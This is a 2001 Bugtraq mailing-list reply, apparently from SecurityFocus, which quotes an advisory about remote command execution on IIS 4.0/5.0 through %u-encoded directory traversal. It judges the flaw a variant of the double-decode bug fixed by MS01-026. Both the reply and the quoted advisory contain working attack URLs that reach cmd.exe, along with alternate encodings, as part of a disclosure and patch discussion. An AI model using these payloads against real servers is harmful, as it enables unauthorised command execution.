[22683] in bugtraq
Re: New vulnerability in IIS4.0/5.0
daemon@ATHENA.MIT.EDU (Dave Ahmad)
Wed Sep 19 15:54:28 2001
Date: Wed, 19 Sep 2001 13:50:02 -0600 (MDT)
From: Dave Ahmad <da@securityfocus.com>
To: ALife // BERG <buginfo@inbox.ru>
Cc: <Bugtraq@securityfocus.com>
In-Reply-To: <E15jdo8-000NZy-00@f12.port.ru>
Message-ID: <Pine.GSO.4.30.0109191127570.19628-100000@mail>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
This seems to be just be another way to exploit the double decode
vulnerability (Bugtraq ID 2708). There is a possibility that it may be a
new issue due to the use of '%u' method of encoding. It does not look
that way to us.
On our test machines (and at eEye), systems do not seem to be vulnerable
after applying the MS01-026 hotfix (or the MS01-044 patch).
Ryan Permeh of eEye Digital Security provided a breakdown of an encoded
attack string:
The attack string used successfully against an IIS server (Win2K, SP2):
http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c
+dir+c:\
first decode sequence(it replaces %u0025 with %)
http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
second decode sequence (it replaces %u005c with /)
http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\
The double decode vulnerability is fixed in MS01-026. I believe the fix
is included in the cumulative patch released with MS01-044.
It doesn't look like a new vulnerability, but we are awaiting confirmation
from Microsoft.
Has anyone managed to exploit a patched system?
Thanks Ryan & eEye.
Regards,
Dave Ahmad
Security Focus
www.securityfocus.com
On Wed, 19 Sep 2001, ALife // BERG wrote:
> -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
>
> Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> -------------------------------------[ security.instock.ru ]--------------
>
> Topic: Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> Announced: 2001-09-19
> Credits: ALife <buginfo@inbox.ru>
> Affects: Microsoft IIS 4.0/5.0
>
> --------------------------------------------------------------------------
>
> ---[ Description
>
> For example, target has a virtual executable directory (e.g.
> "scripts") that is located on the same driver of Windows system.
> Submit request like this:
>
> http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
>
> Directory list of C:\ will be revealed.
>
> Of course, same effect can be achieved by this kind of processing
> to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c",
> "..%u0025%u005c" ...
>
> Note: Attacker can run commands of IUSR_machinename account privilege
> only.
